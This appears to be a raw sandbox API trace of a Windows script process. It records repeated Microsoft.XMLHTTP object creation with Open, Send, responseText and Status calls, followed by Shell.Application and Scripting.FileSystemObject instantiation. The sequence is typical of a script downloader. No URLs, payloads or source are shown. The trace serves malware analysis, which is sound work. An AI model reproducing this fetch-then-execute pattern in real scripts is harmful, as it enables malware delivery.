	[0250.500] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0250.501] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0250.501] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0250.501] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0250.501] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c78) returned 0x0
	[0250.501] ??2@YAPEAX_K@Z () returned 0x62f330
	[0250.501] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c78, pUnkSite=0x62f330) 
	[0250.501] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0250.501] XMLHTTPRequest:IUnknown:Release (This=0x49c5c78) returned 0x0
	[0250.501] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0250.501] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0250.501] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0250.501] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0250.501] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0250.501] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0250.501] SysStringLen (param_1=0x0) returned 0x0
	[0250.501] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0250.501] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0250.501] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72d0) returned 0x0
	[0250.502] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0250.502] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7338) returned 0x0
	[0250.502] ??2@YAPEAX_K@Z () returned 0x62f310
	[0250.502] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7338, pUnkSite=0x62f310) 
	[0250.502] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0250.502] XMLHTTPRequest:IUnknown:Release (This=0x49c7338) returned 0x0
	[0250.502] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72d0) returned 0x0
	[0250.502] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72d0) returned 0x3
	[0250.502] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0250.502] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0250.502] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0250.502] longjmp () 
	[0250.502] longjmp () 
	[0250.502] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0250.502] SysStringLen (param_1=0x0) returned 0x0
	[0250.502] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0250.502] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0250.502] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0250.503] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0250.503] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0250.503] ??2@YAPEAX_K@Z () returned 0x62f330
	[0250.503] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0250.503] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0250.503] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0250.503] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0250.503] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0250.503] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0250.503] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0250.503] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0250.503] longjmp () 
	[0250.503] longjmp () 
	[0250.503] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0250.503] SysStringLen (param_1=0x0) returned 0x0
	[0250.503] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0250.503] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0250.503] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7480) returned 0x0
	[0250.503] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0250.503] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7338) returned 0x0
	[0250.504] ??2@YAPEAX_K@Z () returned 0x62f310
	[0250.504] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7338, pUnkSite=0x62f310) 
	[0250.504] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0250.504] XMLHTTPRequest:IUnknown:Release (This=0x49c7338) returned 0x0
	[0250.504] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7480) returned 0x0
	[0250.504] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7480) returned 0x3
	[0250.504] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0250.504] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0250.504] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0250.504] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0250.504] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0250.504] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0250.931] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0250.931] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0250.931] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0250.931] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0250.931] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0250.931] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0250.932] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0250.932] SysStringLen (param_1=0x0) returned 0x0
	[0250.932] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0250.932] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0250.932] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0250.932] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0250.932] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0250.932] ??2@YAPEAX_K@Z () returned 0x62f350
	[0250.932] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0250.932] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0250.932] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0250.932] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0250.932] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0250.932] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0250.932] SysStringLen (param_1=0x0) returned 0x0
	[0250.932] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0250.936] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0250.936] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0250.936] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0250.936] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0250.936] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0250.936] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0251.687] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0251.687] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0251.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0251.689] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0251.689] SysStringLen (param_1=0x0) returned 0x0
